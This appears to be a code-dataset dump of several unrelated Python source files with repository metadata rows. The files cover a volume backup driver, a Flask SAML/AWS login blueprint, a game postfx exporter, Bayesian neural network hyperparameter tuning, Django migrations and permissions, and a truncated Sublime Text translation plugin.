os.fsync(fileno)
# Restoring a backup to a volume can take some time. Yield so other
# threads can run, allowing for among other things the service
# status to be updated
eventlet.sleep(0)
LOG.debug('v1 volume backup restore of %s finished.',
backup_id)
def restore(self, backup, volume_id, volume_file):
"""Restore the given volume backup from backup repository."""
backup_id = backup['id']
container = backup['container']
object_prefix = backup['service_metadata']
LOG.debug('starting restore of backup %(object_prefix)s '
'container: %(container)s, to volume %(volume_id)s, '
'backup: %(backup_id)s.',
{
'object_prefix': object_prefix,
'container': container,
'volume_id': volume_id,
'backup_id': backup_id,
})
metadata = self._read_metadata(backup)
metadata_version = metadata['version']
LOG.debug('Restoring backup version %s', metadata_version)
try:
restore_func = getattr(self, self.DRIVER_VERSION_MAPPING.get(
metadata_version))
except TypeError:
err = (_('No support to restore backup version %s')
% metadata_version)
raise exception.InvalidBackup(reason=err)
# Build a list of backups based on parent_id. A full backup
# will be the last one in the list.
backup_list = []
backup_list.append(backup)
current_backup = backup
while current_backup.parent_id:
prev_backup = objects.Backup.get_by_id(self.context,
current_backup.parent_id)
backup_list.append(prev_backup)
current_backup = prev_backup
# Do a full restore first, then layer the incremental backups
# on top of it in order.
index = len(backup_list) - 1
while index >= 0:
backup1 = backup_list[index]
index = index - 1
metadata = self._read_metadata(backup1)
restore_func(backup1, volume_id, metadata, volume_file)
volume_meta = metadata.get('volume_meta', None)
try:
if volume_meta:
self.put_metadata(volume_id, volume_meta)
else:
LOG.debug("No volume metadata in this backup.")
except exception.BackupMetadataUnsupportedVersion:
msg = _("Metadata restore failed due to incompatible version.")
LOG.error(msg)
raise exception.BackupOperationError(msg)
LOG.debug('restore %(backup_id)s to %(volume_id)s finished.',
{'backup_id': backup_id, 'volume_id': volume_id})
def delete_backup(self, backup):
"""Delete the given backup."""
container = backup['container']
object_prefix = backup['service_metadata']
LOG.debug('delete started, backup: %(id)s, container: %(cont)s, '
'prefix: %(pre)s.',
{'id': backup['id'],
'cont': container,
'pre': object_prefix})
if container is not None and object_prefix is not None:
object_names = []
try:
object_names = self._generate_object_names(backup)
except Exception:
LOG.warning('Error while listing objects, continuing'
' with delete.')
for object_name in object_names:
self.delete_object(container, object_name)
LOG.debug('deleted object: %(object_name)s'
' in container: %(container)s.',
{
'object_name': object_name,
'container': container
})
# Deleting a backup's objects can take some time.
# Yield so other threads can run
eventlet.sleep(0)
LOG.debug('delete %s finished.', backup['id'])
| 43.64698 | 84 | 0.584371 |
147a6bf0bb56cdd6ac097cbced23164597f83d22 | 2,745 | py | Python | web.py | go-sari/sari-web | dbdaac15c05851aba19465b02b3240b807704bbb | [
"Apache-2.0"
] | null | null | null | web.py | go-sari/sari-web | dbdaac15c05851aba19465b02b3240b807704bbb | [
"Apache-2.0"
] | 1 | 2021-05-30T23:35:23.000Z | 2021-05-30T23:35:23.000Z | web.py | go-sari/sari-web | dbdaac15c05851aba19465b02b3240b807704bbb | [
"Apache-2.0"
] | null | null | null | from flask import Blueprint, session, render_template, url_for, request
from saml2 import entity
from common import (
SariConfig,
get_boto3_session,
saml_client_for,
saml_disable_response_verify,
saml_enum_account_aliases,
saml_enum_aws_roles,
sts_assume_role_with_saml,
)
try:
# noinspection PyUnresolvedReferences
from version import app_version
except ModuleNotFoundError:
app_version = "LATEST"
web_bp = Blueprint('web_bp', __name__)
@web_bp.route("/saml/idp/<idp_name>", methods=['POST'])
def idp_initiated(idp_name):
acs_url = url_for("web_bp.idp_initiated", idp_name=idp_name, _external=True)
saml_client = saml_client_for(acs_url)
saml_assertion = request.form['SAMLResponse']
saml_disable_response_verify()
authn_response = saml_client.parse_authn_request_response(saml_assertion, entity.BINDING_HTTP_POST)
user_info = authn_response.get_subject()
session["login"] = user_info.text
session["app_version"] = app_version
aws_roles = saml_enum_aws_roles(authn_response)
accounts = saml_enum_account_aliases(authn_response)
if not aws_roles:
raise ValueError("Invalid assertion: no roles defined")
if len(aws_roles) == 1:
account_id = next(iter(aws_roles))
elif 'account_id' in request.form:
account_id = request.form['account_id']
else:
return render_template('select_account/page.html', accounts=accounts, saml_assertion=saml_assertion,
session_timeout=authn_response.not_on_or_after)
role_arn, principal_arn = aws_roles[account_id]
aws_credentials = sts_assume_role_with_saml(role_arn, principal_arn, saml_assertion)
session["aws_credentials"] = aws_credentials
session["sari_config"] = SariConfig.from_aws(get_boto3_session(aws_credentials)).to_json()
account = dict(alias=accounts[account_id], id=account_id)
return render_template('db_config/page.html', session=session, aws_account=account,
session_timeout=int(aws_credentials['Expiration'].timestamp()))
@web_bp.route("/logout", methods=["POST"])
def logout():
return do_farewell(header1="You are logged out!")
# noinspection PyUnusedLocal
@web_bp.errorhandler(404)
def error_not_found(error):
return do_farewell(header1="Oops!", header2="The requested page was not found", emoji="sad")
def do_farewell(header1, header2=None, emoji=None):
session["aws_credentials"] = {}
session["sari_config"] = {}
return render_template('farewell.html',
header1=header1,
header2=(header2 or ""),
emoji_url=url_for('static', filename=f'images/{emoji or "see-ya"}.png'))
| 35.649351 | 108 | 0.714026 |
6d58f7c5436191959abdd0432ef4fb2518633e07 | 1,196 | py | Python | Module_system 1.171/process_postfx.py | Sea-Monster/WarbandModuleSystem | 66c67147692707b85c457db10a112627118733a5 | [
"MIT"
] | 14 | 2018-09-20T23:01:27.000Z | 2021-05-25T11:05:09.000Z | Module_system 1.171/process_postfx.py | Sea-Monster/WarbandModuleSystem | 66c67147692707b85c457db10a112627118733a5 | [
"MIT"
] | 44 | 2018-09-15T03:05:50.000Z | 2022-03-22T02:46:24.000Z | Module_system 1.171/process_postfx.py | Sea-Monster/WarbandModuleSystem | 66c67147692707b85c457db10a112627118733a5 | [
"MIT"
] | 13 | 2018-10-02T11:45:24.000Z | 2021-08-22T18:41:44.000Z | from header_common import *
from module_info import *
from module_postfx import *
def write_python_header(postfx_params_list):
file = open("./ID_postfx_params.py","w")
for i_postfx_param in xrange(len(postfx_params_list)):
file.write("pfx_%s = %d\n"%(postfx_params_list[i_postfx_param][0],i_postfx_param))
file.write("\n\n")
file.close()
def write_postfx_params(postfx_params_list):
ofile = open(export_dir + "postfx.txt","w")
ofile.write("postfx_paramsfile version 1\n")
ofile.write("%d\n"%len(postfx_params_list))
for postfx_param in postfx_params_list:
ofile.write("pfx_%s %d %d"%(postfx_param[0], postfx_param[1],postfx_param[2]))
params_list1 = postfx_param[3]
params_list2 = postfx_param[4]
params_list3 = postfx_param[5]
ofile.write(" %f %f %f %f"%(params_list1[0], params_list1[1], params_list1[2], params_list1[3]))
ofile.write(" %f %f %f %f"%(params_list2[0], params_list2[1], params_list2[2], params_list2[3]))
ofile.write(" %f %f %f %f\n"%(params_list3[0], params_list3[1], params_list3[2], params_list3[3]))
ofile.close()
print "Exporting postfx_params..."
write_postfx_params(postfx_params)
write_python_header(postfx_params)
| 41.241379 | 103 | 0.724916 |
78400bf80e36b79368d93c3579f3bfff6961b30a | 18,464 | py | Python | src/models/find_hyperparameters_svi_methods.py | beamlab-hsph/coverage_quantification | 901b4177395b220f97ae073fe174d185aca7f8bc | [
"Apache-2.0"
] | 1 | 2021-12-16T07:04:42.000Z | 2021-12-16T07:04:42.000Z | src/models/find_hyperparameters_svi_methods.py | valeman/coverage_quantification | 901b4177395b220f97ae073fe174d185aca7f8bc | [
"Apache-2.0"
] | null | null | null | src/models/find_hyperparameters_svi_methods.py | valeman/coverage_quantification | 901b4177395b220f97ae073fe174d185aca7f8bc | [
"Apache-2.0"
] | 1 | 2021-12-16T07:04:07.000Z | 2021-12-16T07:04:07.000Z |
import tensorflow.compat.v2 as tf
import tensorflow_datasets as tfds
import tensorflow_probability as tfp
import numpy as np
import os
from sklearn.preprocessing import StandardScaler
import h5py
import kerastuner as kt
from datetime import datetime
import argparse
from data_utils import *
keras = tf.keras
tfd = tfp.distributions
gfile = tf.io.gfile
"""
Some of the model building code has been adapted from
https://github.com/google-research/google-research/tree/master/uq_benchmark_2019
Thanks to the work of these researchers and see there for more info!
"""
negative_log_likelihood = lambda x, rv_x: -rv_x.log_prob(x)
def _posterior_mean_field(kernel_size, bias_size=0, dtype=None):
"""Posterior function for variational layer."""
n = kernel_size + bias_size
c = np.log(np.expm1(1e-5))
variable_layer = tfp.layers.VariableLayer(
2 * n, dtype=dtype,
initializer=tfp.layers.BlockwiseInitializer([
keras.initializers.TruncatedNormal(mean=0., stddev=0.05, seed=None),
keras.initializers.Constant(np.log(np.expm1(1e-5)))], sizes=[n, n]))
def distribution_fn(t):
scale = 1e-5 + tf.nn.softplus(c + t[Ellipsis, n:])
return tfd.Independent(tfd.Normal(loc=t[Ellipsis, :n], scale=scale),
reinterpreted_batch_ndims=1)
distribution_layer = tfp.layers.DistributionLambda(distribution_fn)
return tf.keras.Sequential([variable_layer, distribution_layer])
def _make_prior_fn(kernel_size, bias_size=0, dtype=None):
del dtype
loc = tf.zeros(kernel_size + bias_size)
def distribution_fn(_):
return tfd.Independent(tfd.Normal(loc=loc, scale=1),
reinterpreted_batch_ndims=1)
return distribution_fn
def make_divergence_fn_for_empirical_bayes(std_prior_scale, examples_per_epoch):
def divergence_fn(q, p, _):
log_probs = tfd.LogNormal(0., std_prior_scale).log_prob(p.stddev())
out = tfd.kl_divergence(q, p) - tf.reduce_sum(log_probs)
return out / examples_per_epoch
return divergence_fn
def make_prior_fn_for_empirical_bayes(init_scale_mean=-1, init_scale_std=0.1):
"""Returns a prior function with stateful parameters for EB models."""
def prior_fn(dtype, shape, name, _, add_variable_fn):
"""A prior for the variational layers."""
untransformed_scale = add_variable_fn(
name=name + '_untransformed_scale',
shape=(1,),
initializer=tf.compat.v1.initializers.random_normal(
mean=init_scale_mean, stddev=init_scale_std),
dtype=dtype,
trainable=False)
loc = add_variable_fn(
name=name + '_loc',
initializer=keras.initializers.Zeros(),
shape=shape,
dtype=dtype,
trainable=True)
scale = 1e-6 + tf.nn.softplus(untransformed_scale)
dist = tfd.Normal(loc=loc, scale=scale)
batch_ndims = tf.size(input=dist.batch_shape_tensor())
return tfd.Independent(dist, reinterpreted_batch_ndims=batch_ndims)
return prior_fn
def dense_variational(units, activation, initial_kl_weight):
return AnnealingDenseVariational(
units,
make_posterior_fn=_posterior_mean_field,
make_prior_fn=make_prior_fn_for_empirical_bayes,
activation=activation,
kl_weight=initial_kl_weight)
def eb_dense_layer(units, activation, eb_prior_fn, divergence_fn):
return tfp.layers.DenseReparameterization(
units,
activation=activation,
kernel_prior_fn=eb_prior_fn,
kernel_posterior_fn=tfp.layers.default_mean_field_normal_fn(
loc_initializer=keras.initializers.he_normal()),
kernel_divergence_fn=divergence_fn)
def predict_N_times(model, test_set, y_norm, num_predictions=200):
predictions = np.squeeze(np.stack([y_norm.inverse_transform(model.predict(test_set)) for _ in range(num_predictions)], axis=1))
return predictions
def compute_quantiles(predictions):
return np.quantile(predictions, [.025, .975], axis=1)
def compute_coverage(predictions, y_norm, y_test):
y_invnorm = y_norm.inverse_transform(y_test)
coverage_boundaries = compute_quantiles(predictions)
covered = np.array([coverage_boundaries[0,i]<y_invnorm[i] and coverage_boundaries[1,i]>y_invnorm[i] for i in range(len(y_invnorm))])
return covered
def _build_svi_eb_model(hp):
'''
Build a stochastic variational inference (SVI) model with an Empirical Bayes (EB) prior
Parameters:
hp (kerastuner.HyperParameters): a hyperparamter object that defines input dimension and the
number of training examples
Returns:
model (keras.Model): a compiled keras model
'''
div_fn = make_divergence_fn_for_empirical_bayes(hp.get('std_prior_scale'), hp.get('num_train_examples')//hp.get('batch_size'))
eb_fn = make_prior_fn_for_empirical_bayes(hp.get('init_prior_scale_mean'), hp.get('init_prior_scale_std'))
dropout_rate = hp.Float('dropout', min_value=0, max_value=.5, default=0.1)
dropout_normal = lambda x: keras.layers.Dropout(dropout_rate)(x, training=None)
inputs = keras.layers.Input((hp.get('input_dimension'),))
width = hp.Int('width', min_value = 16, max_value = 64, step=16)
for i in range(hp.Int('depth', min_value=1, max_value=3)):
if i==0:
net = tfp.layers.DenseReparameterization(
width,
activation='relu',
kernel_prior_fn=eb_fn,
kernel_posterior_fn=tfp.layers.default_mean_field_normal_fn(
loc_initializer=keras.initializers.he_normal()),
kernel_divergence_fn=div_fn)(inputs)
else:
net = dropout_normal(net)
net = tfp.layers.DenseReparameterization(
width,
activation='relu',
kernel_prior_fn=eb_fn,
kernel_posterior_fn=tfp.layers.default_mean_field_normal_fn(
loc_initializer=keras.initializers.he_normal()),
kernel_divergence_fn=div_fn)(net)
net = dropout_normal(net)
net = keras.layers.Dense(
2,
activation='linear')(net)
prediction = tfp.layers.DistributionLambda(lambda t: tfd.Normal(loc=t[..., :1],
scale=1e-3 + tf.math.softplus(0.01 * t[...,1:])))(net)
model = keras.Model(inputs=inputs, outputs=prediction)
model.compile(
keras.optimizers.Adam(learning_rate=hp.Float('learning_rate', min_value=10e-4, max_value=10e-1, sampling='log')),
loss=negative_log_likelihood,
metrics=['mse'],
)
return model
def _build_ll_svi_eb_model(hp):
'''
Build a last layer stochastic variational inference (SVI) model with an Empirical Bayes (EB) prior
Parameters:
hp (kerastuner.HyperParameters): a hyperparamter object that defines input dimension and the
number of training examples
Returns:
model (keras.Model): a compiled keras model
'''
div_fn = make_divergence_fn_for_empirical_bayes(hp.get('std_prior_scale'), hp.get('num_train_examples')//hp.get('batch_size'))
eb_fn = make_prior_fn_for_empirical_bayes(hp.get('init_prior_scale_mean'), hp.get('init_prior_scale_std'))
dropout_rate = hp.Float('dropout', min_value=0, max_value=.5, default=0.1)
dropout_normal = lambda x: keras.layers.Dropout(dropout_rate)(x, training=None)
inputs = keras.layers.Input((hp.get('input_dimension'),))
width = hp.Int('width', min_value = 16, max_value = 64, step=16)
depth = hp.Int('depth', min_value=2, max_value=3)
for i in range(depth-1):
if i==0:
net = keras.layers.Dense(
width,
activation='relu')(inputs)
else:
net = dropout_normal(net)
net = keras.layers.Dense(
width,
activation='relu')(net)
net = dropout_normal(net)
net = tfp.layers.DenseReparameterization(
width,
activation='relu',
kernel_prior_fn=eb_fn,
kernel_posterior_fn=tfp.layers.default_mean_field_normal_fn(
loc_initializer=keras.initializers.he_normal()),
kernel_divergence_fn=div_fn)(net)
net = dropout_normal(net)
net = keras.layers.Dense(
2,
activation='linear')(net)
prediction = tfp.layers.DistributionLambda(lambda t: tfd.Normal(loc=t[..., :1],
scale=1e-3 + tf.math.softplus(0.01 * t[...,1:])))(net)
model = keras.Model(inputs=inputs, outputs=prediction)
model.compile(
keras.optimizers.Adam(learning_rate=hp.Float('learning_rate', min_value=10e-4, max_value=10e-1, sampling='log')),
loss=negative_log_likelihood,
metrics=['mse'],
)
return model
def _build_svi_eb_model_tuner(tuner):
'''
Build a stochastic variational inference (SVI) model with an Empirical Bayes (EB) prior
Parameters:
tuner (EpochRandomTuner): a kerastuner object that has the best hyperparameters
Returns:
model (keras.Model): a compiled keras model
'''
hp = tuner.get_best_hyperparameters()[0]
div_fn = make_divergence_fn_for_empirical_bayes(hp.get('std_prior_scale'), hp.get('num_train_examples')//hp.get('batch_size'))
eb_fn = make_prior_fn_for_empirical_bayes(hp.get('init_prior_scale_mean'), hp.get('init_prior_scale_std'))
dropout_normal = lambda x: keras.layers.Dropout(hp.get('dropout'))(x, training=None)
inputs = keras.layers.Input((hp.get('input_dimension'),))
for i in range(hp.get('depth')):
if i==0:
net = tfp.layers.DenseReparameterization(
hp.get('width'),
activation='relu',
kernel_prior_fn=eb_fn,
kernel_posterior_fn=tfp.layers.default_mean_field_normal_fn(
loc_initializer=keras.initializers.he_normal()),
kernel_divergence_fn=div_fn)(inputs)
else:
net = dropout_normal(net)
net = tfp.layers.DenseReparameterization(
hp.get('width'),
activation='relu',
kernel_prior_fn=eb_fn,
kernel_posterior_fn=tfp.layers.default_mean_field_normal_fn(
loc_initializer=keras.initializers.he_normal()),
kernel_divergence_fn=div_fn)(net)
net = dropout_normal(net)
net = keras.layers.Dense(
2,
activation='linear')(net)
prediction = tfp.layers.DistributionLambda(lambda t: tfd.Normal(loc=t[..., :1],
scale=1e-3 + tf.math.softplus(0.01 * t[...,1:])))(net)
model = keras.Model(inputs=inputs, outputs=prediction)
model.compile(
keras.optimizers.Adam(learning_rate=hp.get('learning_rate')),
loss=negative_log_likelihood,
metrics=['mse'],
)
return model
def _build_ll_svi_eb_model_tuner(tuner):
'''
Build a last layer stochastic variational inference (SVI) model with an Empirical Bayes (EB) prior
Parameters:
tuner (EpochRandomTuner): a kerastuner object that has the best hyperparameters
Returns:
model (keras.Model): a compiled keras model
'''
hp = tuner.get_best_hyperparameters()[0]
div_fn = make_divergence_fn_for_empirical_bayes(hp.get('std_prior_scale'), hp.get('num_train_examples')//hp.get('batch_size'))
eb_fn = make_prior_fn_for_empirical_bayes(hp.get('init_prior_scale_mean'), hp.get('init_prior_scale_std'))
dropout_normal = lambda x: keras.layers.Dropout(hp.get('dropout'))(x, training=None)
inputs = keras.layers.Input((hp.get('input_dimension'),))
for i in range(hp.get('depth')-1):
if i==0:
net = keras.layers.Dense(
hp.get('width'),
activation='relu')(inputs)
else:
net = dropout_normal(net)
net = keras.layers.Dense(
hp.get('width'),
activation='relu')(net)
net = dropout_normal(net)
net = tfp.layers.DenseReparameterization(
hp.get('width'),
activation='relu',
kernel_prior_fn=eb_fn,
kernel_posterior_fn=tfp.layers.default_mean_field_normal_fn(
loc_initializer=keras.initializers.he_normal()),
kernel_divergence_fn=div_fn)(net)
net = dropout_normal(net)
net = keras.layers.Dense(
2,
activation='linear')(net)
prediction = tfp.layers.DistributionLambda(lambda t: tfd.Normal(loc=t[..., :1],
scale=1e-3 + tf.math.softplus(0.01 * t[...,1:])))(net)
model = keras.Model(inputs=inputs, outputs=prediction)
model.compile(
keras.optimizers.Adam(learning_rate=hp_dict.get('learning_rate')),
loss=negative_log_likelihood,
metrics=['mse'],
)
return model
def _build_model(architecture):
'''
Select a model building function
Parameters:
architecture (str): a string which indicates with model builder function to return
Returns:
function: a model builder function
'''
return {"svi": _build_svi_eb_model,
"ll_svi": _build_ll_svi_eb_model}[architecture]
def _build_model_from_tuner(architecture):
'''
Select a model building function
Parameters:
architecture (str): a string which indicates with model builder function to return
Returns:
function: a model builder function
'''
return {"svi": _build_svi_eb_model_tuner,
"ll_svi": _build_ll_svi_eb_model_tuner}[architecture]
def _get_best_tuner(dataset, method, split):
'''
Select the best tuner on a dataset and split and method
Parameters:
dataset (str): which dataset to train on, one of ['bostonHousing', 'concerete', 'energy', 'kin8nm',
'naval-propulsion-plant', 'power-plant', 'protein-tertiary-structure', 'wine-quality-red', 'yacht']
method (str): which model to trian, one of ['svi', 'll_svi']
split (int): which data-fold to use. range [0,19] for all datasets except proteins, then [0,4] inclusive.
Returns:
tuner (EpochRandomTuner): a tuner with best hyperparameters
'''
X_train, y_train, X_validation, y_validation, X_test, y_test = get_data_splits(dataset, split)
X_train, y_train, X_validation, y_validation, X_test, y_test, X_normalizer, y_normalizer = get_normalized_data(X_train, y_train, X_validation, y_validation, X_test, y_test)
hp = kt.HyperParameters()
hp.Fixed('input_dimension', X_train[0].shape[0])
hp.Fixed('num_train_examples', X_train.shape[0])
tuner = EpochRandomTuner(_build_model(method),
objective = 'val_mse',
hyperparameters = hp,
max_trials = 100,
seed = 42,
directory = 'regression_HP_SVI',
project_name = f"{dataset}/{method}/{split}")
tuner.reload()
return tuner
def _build_and_train_from_tuner(dataset, method, split, tuner):
'''
Select a model and train it on a dataset and split
Parameters:
dataset (str): which dataset to train on, one of ['bostonHousing', 'concerete', 'energy', 'kin8nm',
'naval-propulsion-plant', 'power-plant', 'protein-tertiary-structure', 'wine-quality-red', 'yacht']
method (str): which model to trian, one of ['svi', 'll_svi']
split (int): which data-fold to use. range [0,19] for all datasets except proteins, then [0,4] inclusive.
Returns:
model (keras.Model): a trained model from the best hyperparameters
'''
X_train, y_train, X_validation, y_validation, X_test, y_test = get_data_splits(dataset, split)
X_train, y_train, X_validation, y_validation, X_test, y_test, X_normalizer, y_normalizer = get_normalized_data(X_train, y_train, X_validation, y_validation, X_test, y_test)
X_train_val = np.concatenate((X_train, X_validation))
y_train_val = np.concatenate((y_train, y_validation))
model = _build_model_from_tuner(method)(tuner)
print(model.summary())
tensorboard_cb = keras.callbacks.TensorBoard(log_dir=f'/logs/tensorboard/{dataset}/{method}/{split}/')
model.fit(x=X_train_val, y=y_train_val, batch_size=32, callbacks=[tensorboard_cb], epochs=1000)
return model
class EpochRandomTuner(kt.tuners.RandomSearch):
def run_trial(self, trial, *args, **kwargs):
# You can add additional HyperParameters for preprocessing and custom training loops
# via overriding `run_trial`
kwargs['batch_size'] = 32
#kwargs['epochs'] = 300
super(EpochRandomTuner, self).run_trial(trial, *args, **kwargs)
def main():
parser = argparse.ArgumentParser("Find HPs for SVI and LL-SVI")
parser.add_argument("--dataset", type=str, help="Dataset to train on", choices=['bostonHousing', 'concerete', 'energy', 'kin8nm',
'naval-propulsion-plant', 'power-plant', 'protein-tertiary-structure', 'wine-quality-red', 'yacht'])
parser.add_argument("--method", default="", choices=['svi', 'll_svi'],
type=str, help="Method to train with (svi or ll_svi")
args = parser.parse_args()
"""# Find Hyperparameters"""
for _DATASET in [args.dataset]:
for _METHOD in [args.method]:
for _SPLIT in range(20 if _DATASET !='protein-tertiary-structure' else 5):
np.random.seed(0)
tf.random.set_seed(0)
print(f"{_DATASET}/{_METHOD}/{_SPLIT}")
if os.path.isdir(f"/data/regression_HP_SVI/{_DATASET}/{_METHOD}/{_SPLIT}"):
continue
print(f"{_DATASET}/{_METHOD}/{_SPLIT}")
X_train, y_train, X_validation, y_validation, X_test, y_test = get_data_splits(_DATASET, _SPLIT)
X_train, y_train, X_validation, y_validation, X_test, y_test, X_normalizer, y_normalizer = get_normalized_data(X_train, y_train, X_validation, y_validation, X_test, y_test)
hp = kt.HyperParameters()
hp.Fixed('input_dimension', X_train[0].shape[0])
hp.Fixed('num_train_examples', X_train.shape[0])
hp.Fixed('std_prior_scale', 1.5)
hp.Fixed('init_prior_scale_mean', -1)
hp.Fixed('init_prior_scale_std', .1)
hp.Fixed('batch_size', 32)
tensorboard_cb = keras.callbacks.TensorBoard(log_dir=f'/logs/tensorboard/{_DATASET}/{_METHOD}/{_SPLIT}')
tuner = EpochRandomTuner(_build_model(_METHOD),
objective = 'val_mse',
hyperparameters = hp,
max_trials = 50,
seed = 42,
directory = '/data/regression_HP_SVI',
project_name = f"{_DATASET}/{_METHOD}/{_SPLIT}")
tuner.search(X_train, y_train, validation_data = (X_validation, y_validation), epochs=1000 if _METHOD=='svi' else 200, callbacks=[tensorboard_cb], verbose=0)
if __name__ == "__main__":
main()
| 41.773756 | 180 | 0.676776 |
8b21c4ffc2dc6bd6647b070b7a3b015b6daa7ca8 | 819 | py | Python | devops-console/apps/designs/migrations/0004_auto_20190916_1544.py | lilinghell/devops | 1b2890d3f2d9f6e15e5b32d0910bc4768f065adc | [
"Apache-2.0"
] | 4 | 2019-12-06T06:19:33.000Z | 2021-12-23T13:05:06.000Z | devops-console/apps/designs/migrations/0004_auto_20190916_1544.py | lilinghell/devops | 1b2890d3f2d9f6e15e5b32d0910bc4768f065adc | [
"Apache-2.0"
] | 8 | 2020-03-15T03:40:38.000Z | 2022-03-12T00:50:27.000Z | devops-console/apps/designs/migrations/0004_auto_20190916_1544.py | lilinghell/devops | 1b2890d3f2d9f6e15e5b32d0910bc4768f065adc | [
"Apache-2.0"
] | null | null | null | # Generated by Django 2.1.5 on 2019-09-16 07:44
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('designs', '0003_auto_20190916_1130'),
]
operations = [
migrations.AlterField(
model_name='interfacegroup',
name='application',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='interface_group_application', to='applications.Application', verbose_name='归属应用'),
),
migrations.AlterField(
model_name='interfacetest',
name='interface',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='interface_test_interface', to='designs.Interfaces'),
),
]
| 32.76 | 177 | 0.67033 |
2cbe97e4fda922c539bb6ef2b3fa6ca4a191e4f1 | 1,235 | py | Python | src/contrib/permission.py | kcwu/katago-server | c38d70f53223f5b883d35184ecfac2379cb9d38e | [
"MIT"
] | 27 | 2020-05-03T11:01:27.000Z | 2022-03-17T05:33:10.000Z | src/contrib/permission.py | kcwu/katago-server | c38d70f53223f5b883d35184ecfac2379cb9d38e | [
"MIT"
] | 54 | 2020-05-09T01:18:41.000Z | 2022-01-22T10:31:15.000Z | src/contrib/permission.py | kcwu/katago-server | c38d70f53223f5b883d35184ecfac2379cb9d38e | [
"MIT"
] | 9 | 2020-09-29T11:31:32.000Z | 2022-03-09T01:37:50.000Z | from allauth.account.models import EmailAddress
from django.conf import settings
from rest_framework.permissions import SAFE_METHODS, BasePermission
class ReadOnly(BasePermission):
def has_permission(self, request, view):
return request.method in SAFE_METHODS
class ReadOrAuthCreateOnly(BasePermission):
def has_permission(self, request, view):
if request.method in SAFE_METHODS:
return True
if request.user and request.user.is_authenticated:
if hasattr(settings, "DRF_ACCOUNT_EMAIL_VERIFICATION") and settings.DRF_ACCOUNT_EMAIL_VERIFICATION:
return EmailAddress.objects.filter(user=request.user, verified=True).exists()
return True
return False
def has_object_permission(self, request, view, obj):
return request.method in SAFE_METHODS
class AuthOnly(BasePermission):
def has_permission(self, request, view):
if request.user and request.user.is_authenticated:
if hasattr(settings, "DRF_ACCOUNT_EMAIL_VERIFICATION") and settings.DRF_ACCOUNT_EMAIL_VERIFICATION:
return EmailAddress.objects.filter(user=request.user, verified=True).exists()
return True
return False
| 38.59375 | 111 | 0.727935 |
da062bc67e8acb564dd2337db4c98f25545875d2 | 29,638 | py | Python | core/translate.py | zeusintuivo/SublimeText3-GoogleT | 09a5dee056f9fbd789f199cf5b9d02fc674ed6c1 | [
"MIT"
] | null | null | null | core/translate.py | zeusintuivo/SublimeText3-GoogleT | 09a5dee056f9fbd789f199cf5b9d02fc674ed6c1 | [
"MIT"
] | null | null | null | core/translate.py | zeusintuivo/SublimeText3-GoogleT | 09a5dee056f9fbd789f199cf5b9d02fc674ed6c1 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# coding:utf-8
# https://github.com/zeusintuivo/SublimeText3-GoogleT
__version__ = "1.0.0"
import sublime
try:
# Python 3 assumption
from urllib.request import urlopen, build_opener, Request
from urllib.parse import urlencode, quote, unquote
except ImportError:
# Python 2 assumption
from urllib import urlopen, urlencode, quote, unquote
from json import loads
import re
import json
import random
from pprint import pprint
if sublime.version() < '3':
from urllib2 import urlopen, build_opener, Request
from handler_st2 import *
from socks_st2 import *
else:
from .handler_st3 import *
from .socks_st3 import *
class GoogletTranslateException(Exception):
"""
Default GoogletTranslate exception
>>> GoogletTranslateException("DoctestError")
GoogletTranslateException('DoctestError',)
"""
pass
class GoogletTranslate(object):
string_pattern = r"\"(([^\"\\]|\\.)*)\""
match_string = re.compile(
r"\,?\["
+ string_pattern + r"\,"
+ string_pattern
+ r"\]")
error_codes = {
401: "ERR_TARGET_LANGUAGE_NOT_SPECIFIED",
501: "ERR_SERVICE_NOT_AVAILABLE_TRY_AGAIN_OR_USE_PROXY",
503: "ERR_VALUE_ERROR",
504: "ERR_PROXY_NOT_SPECIFIED",
}
def __init__(self, proxy_enable, proxy_type, proxy_host, proxy_port, source_lang, target_lang):
self.cache = {
'languages': None,
}
self.api_urls = {
'translate': 'https://translate.googleapis.com/translate_a/single?client=gtx&ie=UTF-8&oe=UTF-8&dt=t',
}
if not source_lang:
source_lang = 'auto'
if not target_lang:
target_lang = 'en'
raise GoogletTranslateException(self.error_codes[401])
if proxy_enable == 'yes':
if not proxy_type or not proxy_host or not proxy_port:
raise GoogletTranslateException(self.error_codes[504])
self.source = source_lang
self.target = target_lang
self.proxyok = proxy_enable
self.proxytp = proxy_type
self.proxyho = proxy_host
self.proxypo = proxy_port
@property
def languages(self, cache=True):
try:
if not self.cache['languages'] and cache:
self.cache['languages'] = loads('{"languages":{"af":"Afrikaans","sq":"Albanian","ar":"Arabic",'
'"az":"Azerbaijani","eu":"Basque","bn":"Bengali","be":"Belorussian",'
'"bg":"Bulgarian","ca":"Catalan","zh-CN":"Chinese Simplified",'
'"zh-TW":"Chinese Traditional","hr":"Croatian","cs":"Czech",'
'"da":"Danish","nl":"Dutch","en":"English","eo":"Esperanto",'
'"et":"Estonian","tl":"Filipino","fi":"Finnish","fr":"French",'
'"gl":"Galician","ka":"Georgian","de":"German","el":"Greek",'
'"gu":"Gujarati","ht":"Haitian Creole","iw":"Hebrew",'
'"hi":"Hindi","hu":"Hungarian","is":"Icelandic",'
'"id":"Indonesian","ga":"Irish","it":"Italian",'
'"ja":"Japanese","kn":"Kannada","ko":"Korean",'
'"la":"Latin","lv":"Latvian","lt":"Lithuanian","mk":"Macedonian",'
'"ms":"Malay","mt":"Maltese","no":"Norwegian","fa":"Persian",'
'"pl":"Polish","pt":"Portuguese","ro":"Romanian","ru":"Russian",'
'"sr":"Serbian","sk":"Slovak","sl":"Slovenian","es":"Spanish",'
'"sw":"Swahili","sv":"Swedish","ta":"Tamil","te":"Telugu",'
'"th":"Thai","tr":"Turkish","uk":"Ukrainian","ur":"Urdu",'
'"vi":"Vietnamese","cy":"Welsh","yi":"Yiddish"}}')
except IOError:
raise GoogletTranslateException(self.error_codes[501])
except ValueError:
raise GoogletTranslateException(self.error_codes[503])
return self.cache['languages']
def translate(self, text, target_language, source_language, formato='html'):
original = unquote(quote(text, ''))
print('original:', original)
# if "'" in original:
# original = original.replace("'", '"')
print('orig quo:', original)
if formato == 'plain':
data = self._get_translation_from_google(original)
data = self.filter_tags(data)
elif formato == 'yml':
if len(original) > 256:
print('1')
data = self.fix_too_long_text(original)
else:
print('2')
if self.is_it_just_a_key(original):
if original == source_language + ':': # change fr: to es:
data = target_language + ':'
else:
